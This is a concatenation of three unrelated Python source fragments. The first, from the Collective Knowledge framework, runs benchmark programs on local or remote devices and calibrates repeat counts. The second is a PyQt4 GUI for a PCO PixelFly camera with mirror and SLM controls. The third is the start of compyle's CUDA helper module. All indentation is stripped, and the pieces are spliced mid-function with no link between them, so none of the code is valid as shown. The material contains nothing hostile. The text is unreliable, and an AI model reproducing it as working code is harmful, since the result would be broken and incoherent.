if tosd.get('delete_file_extra','')!='':
y=tosd['delete_file_extra']+df+' '+rse
if o=='con':
ck.out('')
ck.out(y)
ck.out('')
ry=os.system(y)
if os.path.isfile(df):
os.remove(df)
elif os.path.isdir(df):
shutil.rmtree(df,ignore_errors=True)
# Delete global directories locally (needed for ARM WA)
for df in meta.get('clean_dirs',[]):
if df!='':
if o=='con':
ck.out('')
ck.out(' Removing directory '+df+' ...')
ck.out('')
shutil.rmtree(df,ignore_errors=True)
new_directories = rt.get('run_make_directories',[]);
if len(new_directories)>0:
if o=='con':
ck.out(' Creating new directories:')
for new_dir in new_directories:
if remote=='yes':
x=rs+' '+tosd['make_dir']+rdir+new_dir+' '+rse
if o=='con':
ck.out('')
ck.out('Executing: '+x)
r=os.system(x)
else:
shutil.rmtree(new_dir,ignore_errors=True)
os.mkdir(new_dir)
if o=='con': ck.out('')
if sc!='yes' and 'CT_REPEAT_MAIN' in run_vars:
if o=='con':
ck.out(sep)
ck.out('### Calibration '+str(cn)+' out of '+xcn_max+' ; Kernel repeat number = '+str(repeat))
sb=csb
if sc!='yes' and 'CT_REPEAT_MAIN' in run_vars and repeat!=-1:
sb=sb.replace('$#repeat#$', str(repeat))
env['CT_REPEAT_MAIN']=str(repeat)
# Check sudo init
if isd=='yes':
if o=='con':
ck.out(sep)
ck.out(' (preparing sudo - may ask password ...)')
if remote!='yes':
os.system(sudo_init)
if o=='con': ck.out(sep)
# Prepare tmp batch file with run instructions
if rbn=='':
rx=ck.gen_tmp_file({'prefix':'tmp-', 'suffix':sext, 'remove_dir':'yes'})
if rx['return']>0: return rx
fn=rx['file_name']
else:
fn=rbn
xbbp=bbp
if remote=='yes':
xbbp=bbpt
if xbbp!='':
sb=bbp+'\n\n'+sb
rx=ck.save_text_file({'text_file':fn, 'string':sb})
if rx['return']>0: return rx
# Prepare execution
if remote=='yes' and meta.get('run_via_third_party','')!='yes':
# Copy above batch file to remote device
y=tosd.get('remote_push','').replace('$#device#$',xtdid)
y=y.replace('$#file1#$', fn)
y=y.replace('$#file2#$', rdir+fn)
if o=='con':
ck.out(sep)
ck.out(y)
ck.out('')
ry=os.system(y)
if ry>0:
return {'return':1, 'error':'copying to remote device failed'}
# Prepare command line for remote device
y=''
if isd=='yes':
y+=sudo_init+' '+envtsep
y+=sudo_pre+' '+envtsep
y+=tosd.get('interpreter','')+' '+stbp+fn
# x=sb.split('\n')
# for q in x:
# if q!='':
# if y!='': y+=envtsep
# y+=' '+q
if isd=='yes': y=y+' '+envtsep+' '+sudo_post
eifsx1=eifsx
if rs.endswith('"'):
eifsx1=''
elif eifsx!='':
y=y.replace('"','\\"')
yrdir=rdir
if tosd.get('remote_dir_full','')!='':
yrdir=tosd['remote_dir_full']+stdirs+rdir
y=rs+' '+eifsx1+tosd['change_dir']+' '+yrdir+envtsep+' '+y
# Current behaviour on android is to redirect back to the host machine.
# This can result in a significant amount of data transferred. On some devices
# this has caused the adb client to crash. Proposal is to redirect to device and
# transfer back as a normal run_cmd_out file.
# Many options for redirecting to target as all seem to be valid levels to make this choice
rtt=tosd.get('redirect_to_target','')=='yes' or meta.get('redirect_to_target','')=='yes' or rt.get('redirect_to_target','')=='yes'
if not rtt:
y+=eifsx1+' '+rse
if cons!='yes':
if ercmd!='': y+=' '+ercmd
if rco1!='': y+=' '+stro+' '+rco1
if rco2!='': y+=' '+stre+' '+rco2
# Delay command end to after redirects
if rtt:
y+=eifsx1+' '+rse
# if o=='con':
# ck.out(y)
else:
y=''
if sexe!='':
y+=sexe+' '+sbp+fn+envsep
if isd=='yes':
yy=sudo_pre+' '+sbp+fn+' '+envtsep+' '+sudo_post
else:
yy=scall+' '+sbp+fn
y+=' '+yy
if remote!='yes' and ubtr!='': y=ubtr.replace('$#cmd#$',y)
if o=='con':
ck.out(sep)
ck.out('Prepared script:')
ck.out('')
ck.out(sb)
ck.out(sep)
ck.out(' ('+y.strip()+')')
if o=='con':
ck.out('')
ck.out(' (sleep 0.5 sec ...)')
time.sleep(0.5)
ck.out('')
ck.out(' (run ...)')
############################################## Running code here ##############################################
sys.stdout.flush()
start_time1=time.time()
rx=0
rry=0
if skip_exec!='yes':
ry=ck.system_with_timeout({'cmd':y, 'timeout':xrto})
rry=ry['return']
if rry>0:
if rry!=8: return ry
else:
rx=ry['return_code']
elif o=='con':
ck.out('')
ck.out(' * skiped execution ... *')
exec_time=time.time()-start_time1
# Hack to fix occasional strange effect when time.time() is 0
if exec_time<0: exec_time=-exec_time
if sca!='yes':
if fn!='' and os.path.isfile(fn): os.remove(fn)
# Pull files from the device if remote
if remote=='yes':
xrof=rof
if i.get('pull_only_timer_files','')=='yes':
xrof=[fgtf]
for df in xrof:
# Pull output files from device
df0, df1 = os.path.split(df)
# Push data files to device
y=tosd['remote_pull'].replace('$#device#$',xtdid)
y=y.replace('$#file1#$', rdir+df)
y=y.replace('$#file1s#$', df1)
y=y.replace('$#file2#$', df)
if o=='con':
ck.out('')
ck.out(y)
ck.out('')
ry=os.system(y)
y=tosd.get('remote_pull_post','').replace('$#device#$',xtdid)
if y!='':
y=y.replace('$#file1#$', rdir+df)
y=y.replace('$#file1s#$', df1)
y=y.replace('$#file2#$', df)
if o=='con':
ck.out(sep)
ck.out(y)
ck.out('')
ry=os.system(y)
if ry>0:
return {'return':1, 'error':'pulling from remote device failed'}
# Check if print files
pfar=vcmd.get('print_files_after_run',[])
if len(pfar)==0:
pfar=meta.get('print_files_after_run',[])
if len(pfar)>0 and sfp!='yes' and o=='con' and not b_min_run:
ck.out('')
ck.out(' (printing output files) ')
for q in pfar:
ck.out('')
ck.out(' * '+q)
ck.out('')
rz=ck.load_text_file({'text_file':q, 'split_to_list':'yes', 'encoding':sys.stdout.encoding})
if rz['return']==0:
lxx=rz['lst']
for q1 in lxx:
ck.out(' '+q1)
# Check if post-processing script from CMD
if pp_uoa!='' and skip_exec!='yes' and not b_min_run:
if o=='con':
ck.out('')
ck.out(' (post processing from script '+pp_uoa+' / '+pp_name+' ... )"')
ck.out('')
iz={'action':'run',
'module_uoa':cfg['module_deps']['script'],
'data_uoa':pp_uoa,
'name':pp_name,
'params':pp_params}
rz=ck.access(iz)
if rz['return']>0: return rz
# For now ignore output
# Check if post-processing script
srx=0 # script exit code
# Newer variant (more consistent with pre_process_via_ck
if type(lppcvc)==dict and len(lppcvc)>0 and skip_exec!='yes' and not b_min_run:
pvck=lppcvc
pvckp=src_path_local
pvckm=pvck.get('module_uoa','')
if pvckm=='': pvckm=work['self_module_uid']
pvckd=pvck.get('data_uoa','')
if pvckd!='':
rp=ck.access({'action':'find',
'module_uoa':pvckm,
'data_uoa':pvckd})
if rp['return']>0: return rp
pvckp=rp['path']
pvckc=pvck.get('script_name','')
if pvckc=='': pvckc='postprocess'
if o=='con':
ck.out('')
ck.out(' (post processing via CK ('+pvckp+', '+pvckc+')')
ck.out('')
# Check if has custom script
try:
cdd=os.getcwd()
except OSError:
os.chdir('..')
cdd=os.getcwd()
cs=None
rxx=ck.load_module_from_path({'path':pvckp, 'module_code_name':pvckc, 'skip_init':'yes'})
cs=rxx.get('code', None)
if cs==None:
rxx['return']=1
rxx['error']='problem loading python code: '+rxx['error']
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
if rxx['return']==0:
os.chdir(cdd) # restore current dir from above operation
if cs!=None and 'ck_check_output' in dir(cs):
ck_check_output=cs.ck_check_output
if cs!=None and 'ck_postprocess' in dir(cs):
as_cmd=False
# Call customized script
ii={"host_os_uoa":hosx,
"host_os_uid":hos,
"host_os_dict":hosd,
"target_os_uoa":tosx,
"target_os_uid":tos,
"target_os_dict":tosd,
"target_device_id":tdid,
"ck_kernel":ck,
"misc":misc,
"meta":meta,
"deps":deps,
"env":env,
"dataset_uoa":dduoa,
"dataset_file":dfile,
"dataset_path":dp,
"dataset_meta":dset,
"run_time":rt,
"params":params,
"device_cfg":device_cfg,
"out":oo
}
rxx=cs.ck_postprocess(ii)
srx=rxx['return']
if srx==0:
xchars=rxx.get('characteristics',{})
if len(xchars)>0:
et=xchars.get('execution_time','')
if et!='':
exec_time=float(et)
ccc.update(xchars)
if len(rxx.get('misc',{}))>0:
misc.update(rxx['misc'])
else:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# Older variant
if len(lppc)>0 and skip_exec!='yes' and not b_min_run:
for ppc in lppc:
while ppc.find('$<<')>=0:
j1=ppc.find('$<<')
j2=ppc.find('>>$')
if j2>0:
j3=ppc[j1+3:j2]
ppc=ppc[:j1]+env.get(j3,'')+ppc[j2+3:]
ppc=ppc.replace('$<<',svarb).replace('>>$',svare)
ppc=ppc.replace('$#dir_sep#$',stdirs)
ppc=ppc.replace('$#src_path_local#$', src_path_local).replace('$#src_path#$', src_path)
# Post-processing is performed on the local machine, so dataset path should be local, not remote!
# if remote=='yes':
# ppc=ppc.replace('$#dataset_path#$','')
# elif dp!='':
ppc=ppc.replace('$#dataset_path#$',dp+sdirs)
r9=substitute_some_ck_keys({'string':ppc})
if r9['return']>0: return r9
ppc=r9['string']
if o=='con':
ck.out('')
ck.out(' (post processing: "'+ppc+'"')
ck.out('')
# Check if via CK, otherwise run as system
if lppcvc=='yes':
ppcs=ppc.split()
if len(ppcs)>1:
if ppcs[0].startswith('python'):
ppcm=ppcs[1]
ppcm1=os.path.basename(ppcm)
ppcm2=os.path.dirname(ppcm)
if ppcm1.endswith('.py'):
ppcm1=ppcm1[:-3]
# Check if has custom script
try:
cdd=os.getcwd()
except OSError:
os.chdir('..')
cdd=os.getcwd()
cs=None
rxx=ck.load_module_from_path({'path':ppcm2, 'module_code_name':ppcm1, 'skip_init':'yes'})
if rxx['return']>0:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
cs=rxx['code']
os.chdir(cdd) # restore current dir from above operation
if cs!=None and 'ck_check_output' in dir(cs):
ck_check_output=cs.ck_check_output
if cs!=None and 'ck_postprocess' in dir(cs):
as_cmd=False
# Call customized script
ii={"host_os_uoa":hosx,
"host_os_uid":hos,
"host_os_dict":hosd,
"target_os_uoa":tosx,
"target_os_uid":tos,
"target_os_dict":tosd,
"target_device_id":tdid,
"ck_kernel":ck,
"misc":misc,
"meta":meta,
"deps":deps,
"env":env,
"dataset_uoa":dduoa,
"dataset_file":dfile,
"dataset_path":dp,
"dataset_meta":dset,
"run_time":rt,
"params":params,
"device_cfg":device_cfg,
"out":oo
}
rxx=cs.ck_postprocess(ii)
srx=rxx['return']
if srx==0:
xchars=rxx.get('characteristics',{})
if len(xchars)>0:
et=xchars.get('execution_time','')
if et!='':
exec_time=float(et)
ccc.update(xchars)
if len(rxx.get('misc',{}))>0:
misc.update(rxx['misc'])
else:
if o=='con':
ck.out(' (post processing script failed: '+rxx['error']+'!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rxx['error']
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
else:
srx=os.system(ppc)
# If error code > 0, set as the error code of the main program and quit
if srx>0:
if o=='con':
ck.out(' (post processing script failed!)')
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='post processing script failed'
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# If script failed, exit
if srx>0:
# break
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
# Check if fine-grain time
if fgtf!='' and skip_exec!='yes' and not b_min_run:
if o=='con':
ck.out('')
ck.out(' (reading fine grain timers from '+fgtf+' ...)')
ck.out('')
rq=ck.load_json_file({'json_file':fgtf})
if rq['return']>0:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=rq['error']
ccc['return_code']=rx
if o=='con':
ck.out('')
ck.out('Program execution likely failed (can\'t find fine grain timers)!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
drq=rq['dict']
ccc.update(drq)
et=drq.get('execution_time','')
exec_time=0.0
if et!='':
exec_time=float(et)
if o=='con' and not skip_print_timers:
import json
ck.out(json.dumps(drq, indent=2, sort_keys=True))
ck.out('')
# If return code >0 and program does not ignore return code, quit
if (rx>0 and \
vcmd.get('ignore_return_code','').lower()!='yes' and \
meta.get('ignore_return_code','').lower()!='yes') or rry>0:
break
# Check calibration
if sc=='yes' or repeat==-1 or 'CT_REPEAT_MAIN' not in run_vars:
calibrate_success=True
break
orepeat=repeat
if exec_time<0.5: repeat*=10
elif 0.8<(calibrate_time/exec_time)<1.4:
calibrate_success=True
break
else:
repeat*=float(calibrate_time/exec_time)
if repeat<1: repeat=1
repeat=int(repeat)
if repeat==orepeat:
calibrate_success=True
break
if o=='con' and sc!='yes':
ck.out('')
ck.out('### Calibration: time='+str(exec_time)+'; CT_REPEAT_MAIN='+str(orepeat)+'; new CT_REPEAT_MAIN='+str(repeat))
if cn>=cn_max:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='calibration failed'
if o=='con':
ck.out('')
ck.out('Program execution likely failed ('+misc['fail_reason']+')!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
cn+=1
if sc!='yes' and repeat!=-1 and 'CT_REPEAT_MAIN' in run_vars:
if calibrate_success==False:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='calibration problem'
if o=='con':
ck.out('')
ck.out('Program execution likely failed ('+misc['fail_reason']+')!')
ck.out('')
return {'return':0, 'tmp_dir':rcdir, 'misc':misc, 'characteristics':ccc, 'deps':deps}
xrepeat=repeat
if xrepeat<1: xrepeat=1
ccc['return_code']=rx
ccc['execution_time']=exec_time/abs(repeat)
ccc['total_execution_time']=exec_time
ccc['repeat']=xrepeat
misc['calibration_success']=calibrate_success
if rry==8:
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']=ry['error']
ccc['run_success']='no'
ccc['run_success_bool']=False
ccc['fail_reason']=ry['error']
if rx>0 and vcmd.get('ignore_return_code','').lower()!='yes':
misc['run_success']='no'
misc['run_success_bool']=False
misc['fail_reason']='return code '+str(rx)+' !=0 '
ccc['run_success']='no'
ccc['run_success_bool']=False
ccc['fail_reason']='return code '+str(rx)+' !=0 '
else:
misc['run_success']='yes'
misc['run_success_bool']=True
ccc['run_success']='yes'
ccc['run_success_bool']=True
ccc['execution_time_with_module']=time.time()-start_time
# Check output correctness, if needed | |
__author__ = '<NAME>'
from PyQt4 import QtCore, QtGui
from core.pco_definitions import PixelFly
from threading import Thread
import os, time, sys, pickle
import pyqtgraph as pg
from astropy.io import fits
import numpy as np
import matlab.engine
from queue import Empty
import pygame, os, time, pickle
import win32api
class CameraWidget(QtGui.QWidget):
"""
The CameraWidget class provides the user interface for the PCO PixelFly camera. It bases the connection to the
camera through the pyPCOPixelFly.pco_definitions module. The basic framework of the class is PyQt4 an wrapper of the
Qt framework and the pyqtgraph (url-here) module is essential for the use of this user interface.
Dependencies:
-- SC2_Cam.dll : the dynamic library that interfaces the camera hardware (please contain it in the same folder as
the file).
-- (Optional) App.ico : the application icon of pco (also needs to be in the same directory).
Basic usage:
Shortcuts:
-- Ctrl + Q : Quits application
-- Ctrl + R :Resets original scale to image
Contact: <NAME>, <EMAIL>
"""
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent)
self.path = os.path.dirname(os.path.realpath("__file__"))
self.save_dir = self.path
self.camera = PixelFly(self.path)
self.connected = False
self.alive = False
self.live_view_bool = False
self.u = 1
self.time_unit_dict = dict(us=1, ms=2)
self.save_settings = self.load_settings()
# set background color to dark gray
self.setAutoFillBackground(True)
p = self.palette()
p.setColor(self.backgroundRole(), QtCore.Qt.darkGray)
self.setPalette(p)
def create_gui(self, MainWindow):
"""
Creates user interface. Initializes all widgets of the application.
:param MainWindow: The Main Application Window -> QtGui.MainWindow()
:return:
"""
# central widget of the Main Window
self.central_widget = QtGui.QWidget(MainWindow)
# set background color to dark gray
self.central_widget.setAutoFillBackground(True)
p = self.central_widget.palette()
p.setColor(self.central_widget.backgroundRole(), QtCore.Qt.darkGray)
self.central_widget.setPalette(p)
# Grid layout to place all widgets
self.widget_layout = QtGui.QGridLayout()
# Graphics Layout Widget to put the image and histogram
self.gw = pg.GraphicsLayoutWidget()
# make margins around image items zero
self.gw.ci.layout.setContentsMargins(0,0,0,0)
# Graphics Layout Widget to put the crosscut curve plot
self.gw_crosscut = pg.GraphicsLayoutWidget()
MainWindow.setCentralWidget(self.central_widget)
# the controls_layout contains all controls of the camera (eg. connection, exposure time, recording..)
self.controls_layout = QtGui.QGridLayout()
self.controls_layout.setSpacing(20) # set spacing between widgets to 20 pixels
# indicators_layout contains all indicators of the camera feed
# The maximum count, the average count in the ROI region, buttons for ROI and crosscut, as well as
# controls of the gray values if the image.
self.indicators_layout = QtGui.QGridLayout()
# ==============================================================================================================
# CONTROL BUTTONS
# ==============================================================================================================
# Button to connect to the camera. Will turn red and display disconnect if it successfully connects.
self.ConnectBtn = QtGui.QPushButton('CONNECT')
self.controls_layout.addWidget(self.ConnectBtn, 0, 0)
# layout for exposure time controls
self.exsposure_time_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.exsposure_time_layout, 2, 0, 4, 5)
# 6 preset values of exposure time. They will be saved and reloaded through a python pickle file.
preset_values = self.save_settings['exposure times']
time_label1 = QtGui.QLabel("1")
time_label2 = QtGui.QLabel("2")
time_label3 = QtGui.QLabel("3")
time_label4 = QtGui.QLabel("4")
time_label5 = QtGui.QLabel("5")
time_label6 = QtGui.QLabel("6")
self.exp_time1 = QtGui.QPushButton(preset_values[0])
self.exp_time2 = QtGui.QPushButton(preset_values[1])
self.exp_time3 = QtGui.QPushButton(preset_values[2])
self.exp_time4 = QtGui.QPushButton(preset_values[3])
self.exp_time5 = QtGui.QPushButton(preset_values[4])
self.exp_time6 = QtGui.QPushButton(preset_values[5])
exposure_frame_title = QtGui.QLabel("Exposure time controls")
self.exsposure_time_layout.addWidget(exposure_frame_title, 0, 0, 1, 3)
self.exsposure_time_layout.addWidget(time_label1, 1, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label2, 2, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label3, 3, 0, 1, 1)
self.exsposure_time_layout.addWidget(time_label4, 1, 2, 1, 1)
self.exsposure_time_layout.addWidget(time_label5, 2, 2, 1, 1)
self.exsposure_time_layout.addWidget(time_label6, 3, 2, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time1, 1,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time2, 2,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time3, 3,1, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time4, 1,3, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time5, 2,3, 1, 1)
self.exsposure_time_layout.addWidget(self.exp_time6, 3,3, 1, 1)
# Edit line widget to input exposure time. It accepts us and ms units with the option of setting a float for
# the ms time unit (eg. 1.5 ms)
self.exp_time_in = QtGui.QLineEdit()
# time units list
self.time_units = QtGui.QComboBox()
# save the time in one of the preset values.
self.save_time = QtGui.QComboBox()
self.exsposure_time_layout.addWidget(self.exp_time_in, 4, 2, 1, 3)
self.exsposure_time_layout.addWidget(self.time_units, 4, 5, 1, 2)
self.exsposure_time_layout.addWidget(self.save_time, 4, 0, 1, 2)
# layout to host the recording controls
self.recording_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.recording_layout, 6, 0, 3, 3)
recording_label = QtGui.QLabel("Recording controls")
self.recording_layout.addWidget(recording_label, 0, 0, 1, 3)
# Live button puts the camera in live view. Has to be stopped before exiting.
self.LiveBtn = QtGui.QPushButton('LIVE')
# Records the specified number of frames and lets the user name the file while adding 000x at the end
# of the file name in FITS data format.
self.RecordBtn = QtGui.QPushButton('RECORD')
# stops live view/recording and disarms the camera
self.StopBtn = QtGui.QPushButton('STOP')
# Label for number of frames to save
frame_lab = QtGui.QLabel('# frames to record:')
# Edit line that accepts integers of the number of frames to save.
self.FramesLab = QtGui.QLineEdit()
self.recording_layout.addWidget(self.LiveBtn, 1, 0, 1, 1)
self.recording_layout.addWidget(self.RecordBtn, 1, 1, 1, 1)
#self.recording_layout.addWidget(self.StopBtn, 2, 0)
self.recording_layout.addWidget(frame_lab, 2, 0, 1, 1)
self.recording_layout.addWidget(self.FramesLab, 2, 1)
# Callbacks for all the control buttons
self.exp_time1.clicked.connect(self.exp_time_callback)
self.exp_time2.clicked.connect(self.exp_time_callback)
self.exp_time3.clicked.connect(self.exp_time_callback)
self.exp_time4.clicked.connect(self.exp_time_callback)
self.exp_time5.clicked.connect(self.exp_time_callback)
self.exp_time6.released.connect(self.exp_time_callback)
self.exp_time_list = [self.exp_time1, self.exp_time2, self.exp_time3, self.exp_time4,
self.exp_time5, self.exp_time6]
# Add list options for time unit and save buttons.
self.time_units.addItem("us")
self.time_units.addItem("ms")
self.time_units.activated[str].connect(self.onActivatedUnits)
self.save_time.addItem("Save in")
self.save_time.addItem("1")
self.save_time.addItem("2")
self.save_time.addItem("3")
self.save_time.addItem("4")
self.save_time.addItem("5")
self.save_time.addItem("6")
self.save_time.activated[str].connect(self.onActivatedSave)
# Connect Enter/Return key press with callback for setting the exposure time.
self.exp_time_in.returnPressed.connect(self.onReturnPress)
# Connect callbacks for connect, live and stop buttons
self.ConnectBtn.clicked.connect(self.connect_camera)
self.ConnectBtn.setStyleSheet("background-color: darkCyan")
self.FramesLab.setText('20')
self.LiveBtn.clicked.connect(self.live_callback)
#self.StopBtn.clicked.connect(self.stop_callback)
self.RecordBtn.clicked.connect(self.record_callback)
# layout to host the response matrix m
self.ReponseMatrix_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.ReponseMatrix_layout, 15, 0, 3, 3)
# to start DM
self.openDM_Btn = QtGui.QPushButton('open DM')
# for response matrix
self.ReponseMatrix_Btn = QtGui.QPushButton('RESPONSE MATRIX')
# to close the DM after measurement
self.closeDM_Btn = QtGui.QPushButton('close DM')
# for the Zernike coefficient
Enter_ZAmplitude = QtGui.QLabel("Amplitude:")
self.Zernike_coef = QtGui.QLineEdit()
self.Zernike_coef.setText("5")
self.ReponseMatrix_layout.addWidget(Enter_ZAmplitude, 1, 0)
self.ReponseMatrix_layout.addWidget(self.Zernike_coef, 1, 1)
self.ReponseMatrix_layout.addWidget(self.ReponseMatrix_Btn, 3, 0)
self.ReponseMatrix_layout.addWidget(self.closeDM_Btn, 2, 1)
self.ReponseMatrix_layout.addWidget(self.openDM_Btn, 2, 0)
self.ReponseMatrix_Btn.clicked.connect(self.Measure_ResponseMatrix)
self.openDM_Btn.clicked.connect(self.open_DM)
self.closeDM_Btn.clicked.connect(self.close_DM)
# layout to host the SLM
self.SLM_layout = QtGui.QGridLayout()
self.controls_layout.addItem(self.SLM_layout, 10, 0, 3, 3)
#to start DM
self.activateSLM_Btn = QtGui.QPushButton('Initialize SLM')
# to close the DM after measurement
# self.closeSLM_Btn = QtGui.QPushButton('close SLM')
# to create the phase map
#self.createSLM_Btn = QtGui.QPushButton('create')
# for the Zernike coefficient
Enter_IoverD = QtGui.QLabel("file:")
#self.Enter_IoverD .setText("D:\Xin LU\\real response matrix\\11X11\\Phase_shift_")
self.file_address = QtGui.QLineEdit()
self.file_address .setText("D:\Xin LU\\real response matrix\\9X9\\phase13_")
self.SLM_layout.addWidget(Enter_IoverD, 1, 0)
self.SLM_layout.addWidget(self.file_address , 1, 1)
self.SLM_layout.addWidget(self.activateSLM_Btn, 2, 0)
self.activateSLM_Btn.clicked.connect(self.activate_SLM)
#self.closeSLM_Btn.clicked.connect(self.close_SLM)
# ==============================================================================================================
# IMAGE OPTIONS AND HANDLES
# ==============================================================================================================
# vb is a viewbox that contains the image item.
self.vb = pg.ViewBox()
# add the view box to the graphics layout
self.gw.addItem(self.vb)
# set the aspect while scaling to be locked, i.e. both axis scale the same.
self.vb.setAspectLocked(lock=True, ratio=1)
# invert Y axis -> PyQt <-> Numpy arrays convention
self.vb.invertY()
# Image Item is the image displaying item. Has a lot of options and the user can zoom in/out by pressing the
# right mouse button and moving the mouse up/down. Furthermore by going over the image with the mouse will
# indicate the coordinates and value.
self.image = pg.ImageItem()
self.vb.addItem(self.image)
# Histogram of the displayed image. User can move the histogram axis and the gray values.
self.hist = pg.HistogramLUTItem(self.image, fillHistogram=False)
self.gw.addItem(self.hist)
# initialize image container variable
self.im = np.zeros((1392, 1040))
# set image to display
self.image.setImage(self.im)
# set initial gray levels
self.image.setLevels([200, 16383])
self.hist.setHistogramRange(200, 16383)
# Region Of Interest(ROI) widget that allows user to define a rectangle of tje image and the average count
# within this will be displayed.
#self.save_settings['ROI position']= ()
self.roi = pg.ROI(pos=self.save_settings['ROI position'], size=self.save_settings['ROI size'])
self.roi.addScaleHandle([1, 1], [0, 0])
self.roi.alive = False
self.vb.addItem(self.roi)
self.roi.hide()
# User can define line and place it on the image and the values profile will be plotted on the crosscut
# graphics layout.
self.line_roi = pg.LineSegmentROI([[680, 520], [720, 520]], pen='r')
self.vb.addItem(self.line_roi)
self.line_roi.hide()
self.line_roi.alive = False
# plot item to contain the crosscut curve
crosscut_plot = pg.PlotItem()
# crosscut curve that plot the data of the line
self.crosscut_curve = pg.PlotCurveItem()
self.gw_crosscut.addItem(crosscut_plot)
crosscut_plot.addItem(self.crosscut_curve)
self.gw_crosscut.hide()
self.gw_crosscut.setFixedWidth(800)
self.gw_crosscut.setFixedHeight(200)
# make viewbox accept mouse hover events
self.vb.acceptHoverEvents()
# connect mouse moving event to callback
self.vb.scene().sigMouseMoved.connect(self.mouseMoved)
self.x, self.y = 0, 0 # mouse position
# connect Ctrl + R key sequence to resetting the image to its original scale
shortcut = QtGui.QShortcut(QtGui.QKeySequence('Ctrl+R'), MainWindow)
shortcut.activated.connect(self.refresh_image)
reset_btn = QtGui.QPushButton('Reset zoom')
reset_btn.clicked.connect(self.refresh_image)
# checkbox enabling log scale
self.log_scale = QtGui.QCheckBox("Log scale")
self.log_scale.stateChanged.connect(self.log_scale_callback)
self.widget_layout.addWidget(self.gw, 0, 0, 6, 8)
self.widget_layout.addWidget(self.gw_crosscut, 6, 3, 2, 6)
self.widget_layout.addItem(self.controls_layout, 1, | |
<filename>compyle/cuda.py
"""Common CUDA related functionality.
"""
from __future__ import print_function
from pytools import Record, RecordWithoutPickling
import logging
from pytools.persistent_dict import KeyBuilder as KeyBuilderBase
from pytools.persistent_dict import WriteOncePersistentDict
from pycuda._cluda import CLUDA_PREAMBLE
import pycuda._mymako as mako
from pycuda.tools import (dtype_to_ctype, bitlog2,
context_dependent_memoize, ScalarArg, VectorArg)
import pycuda.gpuarray as gpuarray
from compyle.thrust.sort import argsort
import pycuda.driver as drv
from pycuda.compiler import SourceModule as _SourceModule
from pycuda.tools import dtype_to_ctype
from pytools import memoize
import numpy as np
import six
_cuda_ctx = False
def set_context():
global _cuda_ctx
if not _cuda_ctx:
import pycuda.autoinit
_cuda_ctx = True
# The following code is taken from pyopencl for struct mapping.
# it should be ported over to pycuda eventually.
import pycuda.gpuarray as gpuarray # noqa
class SourceModule(_SourceModule):
def __getattr__(self, name):
def kernel(*args, **kwargs):
f = self.get_function(name)
return f(*args, **kwargs)
kernel.function_name = name
return kernel
class _CDeclList:
def __init__(self, device):
self.device = device
self.declared_dtypes = set()
self.declarations = []
self.saw_complex = False
def add_dtype(self, dtype):
dtype = np.dtype(dtype)
if dtype.kind == "c":
self.saw_complex = True
if dtype.kind != "V":
return
if dtype in self.declared_dtypes:
return
for name, field_data in sorted(six.iteritems(dtype.fields)):
field_dtype, offset = field_data[:2]
self.add_dtype(field_dtype)
_, cdecl = match_dtype_to_c_struct(
self.device, dtype_to_ctype(dtype), dtype)
self.declarations.append(cdecl)
self.declared_dtypes.add(dtype)
def visit_arguments(self, arguments):
for arg in arguments:
dtype = arg.dtype
if dtype.kind == "c":
self.saw_complex = True
def get_declarations(self):
result = "\n\n".join(self.declarations)
if self.saw_complex:
result = (
"#include <pycuda-complex.h>\n\n"
+ result)
return result
@memoize
def match_dtype_to_c_struct(device, name, dtype, context=None, use_typedef=False):
"""Return a tuple `(dtype, c_decl)` such that the C struct declaration
in `c_decl` and the structure :class:`numpy.dtype` instance `dtype`
have the same memory layout.
Note that *dtype* may be modified from the value that was passed in,
for example to insert padding.
(As a remark on implementation, this routine runs a small kernel on
the given *device* to ensure that :mod:`numpy` and C offsets and
sizes match.)
This example explains the use of this function::
>>> import numpy as np
>>> import pyopencl as cl
>>> import pyopencl.tools
>>> ctx = cl.create_some_context()
>>> dtype = np.dtype([("id", np.uint32), ("value", np.float32)])
>>> dtype, c_decl = pyopencl.tools.match_dtype_to_c_struct(
... ctx.devices[0], 'id_val', dtype)
>>> print c_decl
typedef struct {
unsigned id;
float value;
} id_val;
>>> print dtype
[('id', '<u4'), ('value', '<f4')]
>>> cl.tools.get_or_register_dtype('id_val', dtype)
As this example shows, it is important to call
:func:`get_or_register_dtype` on the modified `dtype` returned by this
function, not the original one.
"""
fields = sorted(
six.iteritems(dtype.fields),
key=lambda name_dtype_offset: name_dtype_offset[1][1]
)
c_fields = []
for field_name, dtype_and_offset in fields:
field_dtype, offset = dtype_and_offset[:2]
